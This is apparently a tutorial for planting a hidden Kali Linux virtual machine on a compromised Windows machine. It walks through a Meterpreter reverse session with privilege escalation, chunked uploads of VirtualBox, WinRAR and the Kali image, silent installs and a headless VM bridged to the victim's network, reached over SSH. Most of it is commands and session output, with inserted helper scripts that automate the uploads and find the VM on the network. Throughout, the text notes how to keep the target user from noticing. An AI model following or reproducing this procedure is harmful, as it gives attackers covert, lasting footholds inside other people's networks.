Upload any OS and install it on a compromised remote machine

The tools listed below are all for Windows, but there is no reason the same setup could not be built on Linux: VBoxManage takes the same arguments there.

Virtualbox https://www.virtualbox.org/wiki/Downloads

Kali (opt for the 32-bit VirtualBox image; the session below uses Kali-Linux-1.1.0a-vbox-486) https://www.offensive-security.com/kali-linux-vmware-arm-image-download/

Winrar http://www.rarlab.com/download.htm

Install VirtualBox on your own PC, download the Kali 32-bit .ova from the link above, import it, start it and log in. Then set up SSH login. There are loads of sites that detail this; I used http://www.drchaos.com/enable-ssh-on-kali-linux/

Below are the commands to install openssh-server and replace the stock host keys, as listed on drchaos.com. Replacing the keys matters: the host keys shipped in the Kali image are the same in every copy of that image (which is why the guide files them under insecure_original_default_kali_keys), so dpkg-reconfigure is run to generate a fresh set. Since this VM will sit on someone else's network, also consider key-only login (PasswordAuthentication no in /etc/ssh/sshd_config) rather than the root password used later in this write-up.

apt-get install openssh-server

update-rc.d -f ssh remove

update-rc.d -f ssh defaults

cd /etc/ssh/

mkdir insecure_original_default_kali_keys

mv ssh_host_* insecure_original_default_kali_keys/

dpkg-reconfigure openssh-server

Make any other changes you want (for example record the new host key fingerprint with ssh-keygen -lf /etc/ssh/ssh_host_rsa_key.pub so you can recognise your VM later), then power it off and export it as an .ova. The export tends to land in one of two places: C:\Users\Your-Name\AppData\Local\VirtualStore\Program Files\Oracle\VirtualBox or My Documents.

Using WinRAR, right-click the exported .ova file and select ‘Add to Archive’. Under the General tab select ‘Split to volume, size’, choose 100 MB and press OK. You need to do this because meterpreter's upload seems to have a size limit and fails with large files. Reading into this, it looks to be partly a Ruby problem, with suggested fixes of increasing the RAM to twice the size of the file you're uploading. I have tried this with 8GB of RAM on the machine I was using and it still failed, so just chop up the file; quick fix!

Get your meterpreter shell, run getsystem (you need at least an administrative token to write into C:\Program Files and run the installer), then start uploading the files. First upload the VirtualBox installer .exe; it is only a little over 100 MB and uploads fine.

msf exploit(handler) > sessions -i 1

[*] Starting interaction with 1...

meterpreter > getsystem

...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)).

meterpreter > upload "/root/Desktop/Link to sf_VB_Share/VB/VirtualBox-5.0.0-101573-Win.exe" "C:\\Program Files"

[*] uploading  : /root/Desktop/Link to sf_VB_Share/VB/VirtualBox-5.0.0-101573-Win.exe -> C:\Program Files

[*] uploaded   : /root/Desktop/Link to sf_VB_Share/VB/VirtualBox-5.0.0-101573-Win.exe -> C:\Program Files\VirtualBox-5.0.0-101573-Win.exe

meterpreter > shell

Process 2504 created.

Channel 2 created.

Microsoft Windows [Version 6.1.7601]

Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

C:\Windows\system32>cd "C:\\Program Files"

cd "C:\\Program Files"

# Run dir to check the upload worked. In the listing below the file shows as 0 bytes, which means the upload failed; upload it again.

17/08/2015  09:57                 0 VirtualBox-5.0.0-101573-Win.exe

# A successful upload looks like this (compare the size against the local file):

17/08/2015  10:13       116,511,944 VirtualBox-5.0.0-101573-Win.exe

# If you try to run a failed (0-byte) upload, Windows pops up an alert on the target's screen saying it is not a valid 32-bit application, so check the size first.

# To install, run the following. The --silent option suppresses the installer UI on the remote machine, but the install still creates a VirtualBox shortcut on the user's desktop once it completes, so expect that artifact.

C:\Program Files>VirtualBox-5.0.0-101573-Win.exe --silent

C:\Program Files>exit

meterpreter > upload "/root/Desktop/Link to sf_VB_Share/VB/Kali_SSH_32BIT/Kali.part01.rar" "C:\\Program Files\\Oracle\\VirtualBox"

[*] uploading  : /root/Desktop/Link to sf_VB_Share/VB/Kali_SSH_32BIT/Kali.part01.rar -> C:\Program Files\Oracle\VirtualBox

# If you see the error below you have hit the upload size limit. Go back to WinRAR and recreate the archive with smaller volumes.

[-] Error running command upload: NoMemoryError failed to allocate memory

# A successful upload:

meterpreter > upload "/root/Desktop/Link to sf_VB_Share/VB/Kali_SSH_32BIT/Kali-Linux-1.1.0a-vbox-486.part01.rar" "C:\\Program Files\\Oracle\\VirtualBox"

[*] uploading  : /root/Desktop/Link to sf_VB_Share/VB/Kali_SSH_32BIT/Kali-Linux-1.1.0a-vbox-486.part01.rar -> C:\Program Files\Oracle\VirtualBox

[*] uploaded   : /root/Desktop/Link to sf_VB_Share/VB/Kali_SSH_32BIT/Kali-Linux-1.1.0a-vbox-486.part01.rar -> C:\Program Files\Oracle\VirtualBox\Kali-Linux-1.1.0a-vbox-486.part01.rar

# Repeat until all parts have been uploaded. Hint: paste the upload command into gedit, duplicate the line once per part, change part01 on each line to the matching part number, then paste the whole list into meterpreter in one go. Keep an eye out for upload errors while it runs. Example below:

upload "/root/Desktop/Link to sf_VB_Share/VB/Kali_SSH_32BIT/Kali-Linux-1.1.0a-vbox-486.part01.rar" "C:\\Program Files\\Oracle\\VirtualBox"

upload "/root/Desktop/Link to sf_VB_Share/VB/Kali_SSH_32BIT/Kali-Linux-1.1.0a-vbox-486.part02.rar" "C:\\Program Files\\Oracle\\VirtualBox"

upload "/root/Desktop/Link to sf_VB_Share/VB/Kali_SSH_32BIT/Kali-Linux-1.1.0a-vbox-486.part03.rar" "C:\\Program Files\\Oracle\\VirtualBox"

upload "/root/Desktop/Link to sf_VB_Share/VB/Kali_SSH_32BIT/Kali-Linux-1.1.0a-vbox-486.part04.rar" "C:\\Program Files\\Oracle\\VirtualBox"
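The split-and-upload steps above (100 MB WinRAR volumes at the ‘Add to Archive’ stage, then one upload line per part) can be scripted on the Kali side. The script below is an added example, not code from the original post: it chunks the image with split, checksums it so a 0-byte or truncated part is caught after reassembly, and writes the upload lines to a Metasploit resource script that you run from the session with meterpreter's resource command. Assumed, not from the page: GNU coreutils (split -d, sha256sum), the file and directory names, and reassembly by plain concatenation (cat) rather than WinRAR's extract.

```shell
#!/bin/sh
# Added example (not from the original post): prepare a large file for
# Meterpreter upload by splitting it into fixed-size parts, recording a
# checksum, and generating a Metasploit resource script with one `upload`
# line per part. Assumptions (not in the original): GNU coreutils split and
# sha256sum; parts are reassembled on the target by plain concatenation
# (WinRAR "extract" on the page, `cat` here).
set -eu

# chunk_file FILE OUTDIR [SIZE]: split FILE into OUTDIR/<name>.part00,
# .part01, ... of SIZE each (default 100m, the size used on the page) and
# print how many parts were written. Two-digit suffixes sort correctly in a
# glob for up to 100 parts; a 3.4 GB image at 100 MB needs 35.
chunk_file() {
    file=$1; outdir=$2; size=${3:-100m}
    mkdir -p "$outdir"
    split -b "$size" -d -a 2 "$file" "$outdir/$(basename "$file").part"
    set -- "$outdir"/*.part*
    echo $#
}

# checksum FILE: sha256 of FILE, taken before upload and again after
# reassembly so a truncated part (the 0-byte uploads the page warns about)
# is caught before you try to import the image.
checksum() {
    sha256sum "$1" | cut -d' ' -f1
}

# write_rc PARTDIR REMOTE_DIR RCFILE: write one meterpreter `upload` command
# per part to RCFILE and print the line count. REMOTE_DIR must already be in
# the doubled-backslash form meterpreter expects, e.g.
# 'C:\\Program Files\\Oracle\\VirtualBox'.
write_rc() {
    partdir=$1; remote=$2; rc=$3
    : > "$rc"
    for p in "$partdir"/*.part*; do
        printf 'upload "%s" "%s"\n' "$p" "$remote" >> "$rc"
    done
    wc -l < "$rc" | tr -d ' '
}

# reassemble PARTDIR OUT: concatenate the parts in order into OUT and print
# the sha256 of the result; it must equal checksum of the original file.
reassemble() {
    cat "$1"/*.part* > "$2"
    checksum "$2"
}

# Usage (only runs when invoked with three arguments):
#   sh prep_upload.sh Kali-Linux-1.1.0a-vbox-486.ova parts upload.rc
# then in meterpreter:  resource /path/to/upload.rc
if [ $# -ge 3 ]; then
    n=$(chunk_file "$1" "$2")
    echo "$n parts written, sha256 $(checksum "$1")"
    write_rc "$2" 'C:\\Program Files\\Oracle\\VirtualBox' "$3" >/dev/null
    echo "resource script: $3"
fi
```

After the parts are on the target, compare each part's size in dir against the local listing before reassembling; a part that shows 0 bytes must be re-uploaded, and the hash of the reassembled file (certutil -hashfile on the Windows side) must equal the one recorded here before you import.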

# Once all parts have been uploaded, upload WinRAR

meterpreter > upload "/root/Desktop/Link to sf_VB_Share/VB/wrar53b2.exe" "C:\\Program Files\\Oracle\\VirtualBox"

[*] uploading  : /root/Desktop/Link to sf_VB_Share/VB/wrar53b2.exe -> C:\Program Files\Oracle\VirtualBox

[*] uploaded   : /root/Desktop/Link to sf_VB_Share/VB/wrar53b2.exe -> C:\Program Files\Oracle\VirtualBox\wrar53b2.exe

meterpreter > shell

Process 3380 created.

Channel 39 created.

Microsoft Windows [Version 6.1.7601]

Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

C:\Windows\system32>cd C:\Program Files\Oracle\VirtualBox\

cd C:\Program Files\Oracle\VirtualBox\

# Run dir to check that every part uploaded with a non-zero size, then install WinRAR. Note that this installer does show a popup on the remote machine even with /s.

C:\Program Files\Oracle\VirtualBox>wrar53b2.exe /s

wrar53b2.exe /s

# Now you're ready to reassemble the uploaded Kali parts into one .ova file. This shows a WinRAR progress window on the target's screen while it runs.

C:\Program Files\Oracle\VirtualBox>"C:\Program Files\WinRAR\WinRAR.exe" x "C:\Program Files\Oracle\VirtualBox\Kali-Linux-1.1.0a-vbox-486.part01.rar"

"C:\Program Files\WinRAR\WinRAR.exe" x "C:\Program Files\Oracle\VirtualBox\Kali-Linux-1.1.0a-vbox-486.part01.rar"

# A dir listing will now show the reassembled .ova as a single file.

17/08/2015  11:06     3,432,329,216 Kali-Linux-1.1.0a-vbox-486.ova

# Now you're ready to use VBoxManage, the command-line interface to VirtualBox. It is installed in C:\Program Files\Oracle\VirtualBox and is not on the PATH, so cd into that directory first; run from anywhere else it fails with 'VBoxManage' is not recognized as an internal or external command, as happens further down.

# To list the registered VMs

C:\Program Files\Oracle\VirtualBox>VBoxManage list vms

VBoxManage list vms

"Kali-Linux-1.1.0a-vbox-486" {1b4d107c-185c-41b9-a870-68cdc7cf8be4}

"Kali-Linux-1.1.0a-vbox-486_1" {0c3a4399-9b76-4236-acf7-5c00537e84b0}

# To import your VM

C:\Program Files\Oracle\VirtualBox>VBoxManage import Kali-Linux-1.1.0a-vbox-486.ova

VBoxManage import Kali-Linux-1.1.0a-vbox-486.ova

# If you see 'Progress state: VBOX_E_FILE_ERROR' while importing, WinRAR most likely has not finished extracting the .ova yet, which takes a few minutes. Wait five minutes, check with dir that the file size has stopped growing, and retry.

# If you see this error, 1.1.0a-vbox-486.ova' (VERR_FILE_NOT_FOUND), make sure the extracted .ova is still in the directory you are running VBoxManage from.

# Below, while importing the VM, my session died at 90%. While annoying, it respawned, and once accessed it was possible to confirm that the VM did import correctly.

C:\Program Files\Oracle\VirtualBox>VBoxManage import Kali-Linux-1.1.0a-vbox-486.ova

VBoxManage import Kali-Linux-1.1.0a-vbox-486.ova

0%...10%...20%...30%...40%...50%...60%...70%...80%...90%...100%

Interpreting C:\Program Files\Oracle\VirtualBox\Kali-Linux-1.1.0a-vbox-486.ova...

OK.

0%...10%...20%...30%...40%...50%...60%...70%...80%...90%...

[*] Sending stage (885806 bytes) to 192.168.0.19

[*] Meterpreter session 3 opened (192.168.0.23:4444 -> 192.168.0.19:49454) at 2015-08-17 07:03:54 -0400

Terminate channel 41? [y/N]  n

Terminate channel 41? [y/N]

[*] 192.168.0.19 - Meterpreter session 2 closed.  Reason: Died

msf exploit(handler) > sessions -i 3

[*] Starting interaction with 3...

meterpreter > shell

Process 3764 created.

Channel 42 created.

Microsoft Windows [Version 6.1.7601]

Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

C:\Windows\system32>cd C:\Program Files\Oracle

cd C:\Program Files\Oracle

C:\Program Files\Oracle>VBoxManage list vms

VBoxManage list vms

'VBoxManage' is not recognized as an internal or external command,

operable program or batch file.

C:\Program Files\Oracle>cd C:\Program Files\Oracle\VirtualBox

cd C:\Program Files\Oracle\VirtualBox

C:\Program Files\Oracle\VirtualBox>VBoxManage list vms

VBoxManage list vms

"Kali-Linux-1.1.0a-vbox-486" {d678687a-6080-4da7-a65b-0119c6864856}

C:\Program Files\Oracle\VirtualBox>

# Once it has imported you need to set up the VM's network card. List the host's adapters so you can bridge to the one the compromised host is actually using: the one whose IPAddress is the address your meterpreter session connects back from (192.168.0.19 here).

C:\Program Files\Oracle\VirtualBox>VBoxManage list bridgedifs

VBoxManage list bridgedifs

Name:            Realtek RTL8168D/8111D Family PCI-E Gigabit Ethernet NIC (NDIS 6.20)

GUID:            26e61cb1-8cd2-4100-b6ce-b03c09fba448

DHCP:            Enabled

IPAddress:       192.168.0.19

NetworkMask:     255.255.255.0

IPV6Address:     fe80:0000:0000:0000:f806:8c84:b5b4:9890

IPV6NetworkMaskPrefixLength: 64

HardwareAddress: 6c:62:6d:71:95:ba

MediumType:      Ethernet

Status:          Up

VBoxNetworkName: HostInterfaceNetworking-Realtek RTL8168D/8111D Family PCI-E Gigabit Ethernet NIC (NDIS 6.20)

# Attach NIC 1 to the chosen host adapter in bridged mode. If you skip this step the VM won't start, typically because the imported configuration still names the adapter from the machine the image was exported on, and that adapter does not exist on the target.

C:\Program Files\Oracle\VirtualBox>VBoxManage modifyvm Kali-Linux-1.1.0a-vbox-486 --nic1 bridged --bridgeadapter1 "Realtek RTL8168D/8111D Family PCI-E Gigabit Ethernet NIC (NDIS 6.20)"

VBoxManage modifyvm Kali-Linux-1.1.0a-vbox-486 --nic1 bridged --bridgeadapter1 "Realtek RTL8168D/8111D Family PCI-E Gigabit Ethernet NIC (NDIS 6.20)"
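Picking the adapter by hand works for one host, but the listing can contain several adapters that are Up (VirtualBox host-only adapters also appear in list bridgedifs). The script below is an added example, not part of the original post: it parses a list bridgedifs listing and returns the adapter whose IPAddress is the address the compromised host connects back from, 192.168.0.19 in the session above, then builds the modifyvm line. The listing embedded in it is constructed for the example; only the Realtek record mirrors the page, and the other two adapters, their GUIDs and MAC addresses are made up.

```shell
#!/bin/sh
# Added example (not from the original post): choose the host adapter to
# bridge to from `VBoxManage list bridgedifs` output by matching IPAddress
# against the address the compromised host connects back from. The sample
# listing is constructed; only the Realtek record mirrors the page.
set -eu

# Constructed sample: a VirtualBox host-only adapter, the real NIC, and a
# disconnected second NIC. All of these show up in `list bridgedifs`.
SAMPLE_BRIDGEDIFS='Name:            VirtualBox Host-Only Ethernet Adapter
GUID:            00000000-0000-4000-8000-000000000001
DHCP:            Disabled
IPAddress:       192.168.56.1
NetworkMask:     255.255.255.0
HardwareAddress: 0a:00:27:00:00:01
MediumType:      Ethernet
Status:          Up
VBoxNetworkName: HostInterfaceNetworking-VirtualBox Host-Only Ethernet Adapter

Name:            Realtek RTL8168D/8111D Family PCI-E Gigabit Ethernet NIC (NDIS 6.20)
GUID:            26e61cb1-8cd2-4100-b6ce-b03c09fba448
DHCP:            Enabled
IPAddress:       192.168.0.19
NetworkMask:     255.255.255.0
HardwareAddress: 6c:62:6d:71:95:ba
MediumType:      Ethernet
Status:          Up
VBoxNetworkName: HostInterfaceNetworking-Realtek RTL8168D/8111D Family PCI-E Gigabit Ethernet NIC (NDIS 6.20)

Name:            Intel(R) 82579LM Gigabit Network Connection
GUID:            00000000-0000-4000-8000-000000000002
DHCP:            Enabled
IPAddress:       0.0.0.0
NetworkMask:     0.0.0.0
HardwareAddress: 02:00:00:aa:bb:cc
MediumType:      Ethernet
Status:          Down
VBoxNetworkName: HostInterfaceNetworking-Intel(R) 82579LM Gigabit Network Connection'

# pick_bridged_if HOST_IP: read a `list bridgedifs` listing on stdin and print
# the Name of the adapter that is Up and holds HOST_IP. Exits 1 if none does.
# Records are separated by blank lines; values may themselves contain colons,
# so a field value is everything after the first "label:" and its padding.
# CRLF line endings (output pasted from a Windows shell) are stripped.
pick_bridged_if() {
    awk -v want="$1" '
        function val(    s) { s = $0; sub(/^[^:]*:[ \t]*/, "", s); return s }
        { sub(/\r$/, "") }
        /^Name:/      { name = val() }
        /^IPAddress:/ { ip = val() }
        /^Status:/    { status = val() }
        /^$/          { if (!found && status == "Up" && ip == want) { print name; found = 1 }
                        name = ""; ip = ""; status = "" }
        END           { if (!found && status == "Up" && ip == want) { print name; found = 1 }
                        if (found) exit 0
                        exit 1 }
    '
}

# bridge_vm_cmd VM ADAPTER: the modifyvm invocation that attaches NIC 1 to
# ADAPTER in bridged mode, as one line to paste into the target's shell.
bridge_vm_cmd() {
    printf 'VBoxManage modifyvm "%s" --nic1 bridged --bridgeadapter1 "%s"\n' "$1" "$2"
}

# Usage: save the `VBoxManage list bridgedifs` output from the target to a
# file, then:  sh pick_adapter.sh 192.168.0.19 Kali-Linux-1.1.0a-vbox-486 < bridgedifs.txt
if [ $# -ge 2 ]; then
    adapter=$(pick_bridged_if "$1")
    bridge_vm_cmd "$2" "$adapter"
fi
```

If no adapter holds the session's source address (for example the host is behind NAT on a second hop), fall back to the listing by hand as the page does, but never pick a host-only or Down adapter: the VM would boot with no route to the network and you would have no way to reach it.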

# To confirm the VM has accepted the adapter, run showvminfo. This prints a lot of detail; below is a cut-down version. Note the MAC in the NIC 1 line (08002739B2BE): that is how you will pick the VM out on the network later, since 08:00:27 is the VirtualBox OUI.

C:\Program Files\Oracle\VirtualBox>VBoxManage showvminfo Kali-Linux-1.1.0a-vbox-486

Name:            Kali-Linux-1.1.0a-vbox-486

Groups:          /

Guest OS:        Linux 2.6 / 3.x / 4.x (64-bit)

SATA (0, 0): C:\Windows\system32\config\systemprofile\VirtualBox VMs\Kali-Linux-1.1.0a-vbox-486\Kali-Linux-1.1.0a-vbox-486-disk1.vmdk (UUID: 461523fd-4d26-4897-a05e-05daf04409e3)

NIC 1:           MAC: 08002739B2BE, Attachment: Bridged Interface 'Realtek RTL8168D/8111D Family PCI-E Gigabit Ethernet NIC (NDIS 6.20)', Cable connected: on, Trace: off (file: none), Type: 82540EM, Reported speed: 0 Mbps, Boot priority: 0, Promisc Policy: deny, Bandwidth group: none

# Then start the VM headless, so no VM window appears on the target's desktop

C:\Program Files\Oracle\VirtualBox>VBoxManage startvm Kali-Linux-1.1.0a-vbox-486 --type headless

VBoxManage startvm Kali-Linux-1.1.0a-vbox-486 --type headless

Waiting for VM "Kali-Linux-1.1.0a-vbox-486" to power on...

VM "Kali-Linux-1.1.0a-vbox-486" has been successfully started.

# This only works on networks that hand out addresses by DHCP, since the VM has no static address configured. Once the VM is up, scan the network from your own Kali box with nmap for a host with SSH open. More than one host may answer, so confirm you have the right one: the MAC nmap reports (08:00:27:39:B2:BE here; 08:00:27 is the VirtualBox OUI, which nmap labels Cadmus Computer Systems) must equal the MAC showvminfo printed for NIC 1, and the SSH host key fingerprint should be the one for the keys you generated in the image before export (ssh-keygen -lf /etc/ssh/ssh_host_rsa_key.pub inside the VM prints it).

root@kali:~# nmap -sS -v --open -p 22 192.168.0.0/24

Starting Nmap 6.49BETA4 ( https://nmap.org ) at 2015-08-17 07:19 EDT

Initiating ARP Ping Scan at 07:19

Scanning 255 hosts [1 port/host]

Nmap scan report for 192.168.0.24

Host is up (0.0038s latency).

PORT   STATE SERVICE

22/tcp open  ssh

MAC Address: 08:00:27:39:B2:BE (Cadmus Computer Systems)

root@kali:~# ssh root@192.168.0.24

root@192.168.0.24's password:

Linux kali 3.18.0-kali3-586 #1 Debian 3.18.6-1~kali2 (2015-03-02) i686

The programs included with the Kali GNU/Linux system are free software;

the exact distribution terms for each program are described in the

individual files in /usr/share/doc/*/copyright.

Kali GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent

permitted by applicable law.

Last login: Fri Aug 14 16:22:24 2015 from 192.168.0.20

root@kali:~# uptime

07:22:27 up 4 min,  1 user,  load average: 0.15, 0.50, 0.27
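Scanning the whole /24 for port 22 finds every SSH server on the segment, not just the VM. The script below is an added example, not part of the original post: it matches the MAC that showvminfo printed for NIC 1 (08002739B2BE) against the MAC nmap reports for each host and returns that host's address. The nmap output embedded in it is constructed (two hosts with SSH open, only one of them the VM); the 192.168.0.20 host and its MAC are made up.

```shell
#!/bin/sh
# Added example (not from the original post): find the headless VM on the
# network by matching the MAC from `VBoxManage showvminfo` (NIC 1) against the
# MAC nmap reports per host, instead of trusting the first host with 22 open.
# The nmap output below is constructed: two hosts answer, one is the VM.
set -eu

SAMPLE_NMAP='Starting Nmap 6.49BETA4 ( https://nmap.org ) at 2015-08-17 07:19 EDT
Nmap scan report for 192.168.0.20
Host is up (0.0012s latency).
PORT   STATE SERVICE
22/tcp open  ssh
MAC Address: 02:00:00:11:22:33 (Unknown)
Nmap scan report for kali (192.168.0.24)
Host is up (0.0038s latency).
PORT   STATE SERVICE
22/tcp open  ssh
MAC Address: 08:00:27:39:B2:BE (Cadmus Computer Systems)
Nmap done: 256 IP addresses (2 hosts up) scanned in 3.21 seconds'

# norm_mac MAC: uppercase hex with separators removed, so 08002739B2BE (as
# printed by showvminfo) and 08:00:27:39:b2:be (as printed by nmap) compare equal.
norm_mac() {
    printf '%s' "$1" | sed 's/[-:]//g' | tr '[:lower:]' '[:upper:]'
}

# find_vm_ip MAC: read nmap output on stdin and print the IP of the host whose
# MAC matches. Handles both "report for 1.2.3.4" and "report for name (1.2.3.4)".
# Exits 1 if no host matches. nmap only prints MAC addresses for hosts on the
# same layer-2 segment as the scanner, and only with raw-socket privileges,
# so run the scan as root from a box on that segment, as the page does.
find_vm_ip() {
    awk -v want="$(norm_mac "$1")" '
        /^Nmap scan report for / { ip = $NF; gsub(/[()]/, "", ip) }
        /^MAC Address:/ {
            mac = toupper($3); gsub(/[-:]/, "", mac)
            if (mac == want) { print ip; found = 1; exit }
        }
        END { if (found) exit 0; exit 1 }
    '
}

# Usage:  nmap -sS -v --open -p 22 192.168.0.0/24 | sh find_vm.sh 08002739B2BE
if [ $# -ge 1 ]; then
    find_vm_ip "$1"
fi
```

Once you have the address, check the host key before typing the root password: ssh-keyscan 192.168.0.24 > vm.pub && ssh-keygen -lf vm.pub should print the fingerprint of the keys you generated in the image with dpkg-reconfigure openssh-server. A different fingerprint means you are talking to some other box on the target's network, not your VM.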

# To power off your VM

C:\Program Files\Oracle\VirtualBox>VBoxManage controlvm Kali-Linux-1.1.0a-vbox-486 poweroff

VBoxManage controlvm Kali-Linux-1.1.0a-vbox-486 poweroff

0%...10%...20%...30%...40%...50%...60%...70%...80%...90%...100%

C:\Program Files\Oracle\VirtualBox>

VirtualBox headless commands

Import a VM

VBoxManage import Image-Name.ova

To list all registered VMs

VBoxManage list vms

To list the physical machine's network adapters

VBoxManage list bridgedifs

To bridge the VM's network card to one of the physical machine's adapters

VBoxManage modifyvm Kali-Linux-1.1.0a-vbox-486 --nic1 bridged --bridgeadapter1 "Realtek RTL8168D/8111D Family PCI-E Gigabit Ethernet NIC (NDIS 6.20)"

To start the VM

VBoxManage startvm Kali-Linux-1.1.0a-vbox-486 --type headless

To power off the VM

VBoxManage controlvm Kali-Linux-1.1.0a-vbox-486 poweroff

To detach the VM's hard disk without deleting the .vmdk file (the controller name, SATA here, is the one showvminfo prints; the old modifyvm "VM-Name" -hda none form is pre-4.0 syntax)

VBoxManage storageattach "VM-Name" --storagectl SATA --port 0 --device 0 --medium none

To unregister the VM and delete its files, including the disk image

VBoxManage unregistervm "VM-Name" --delete
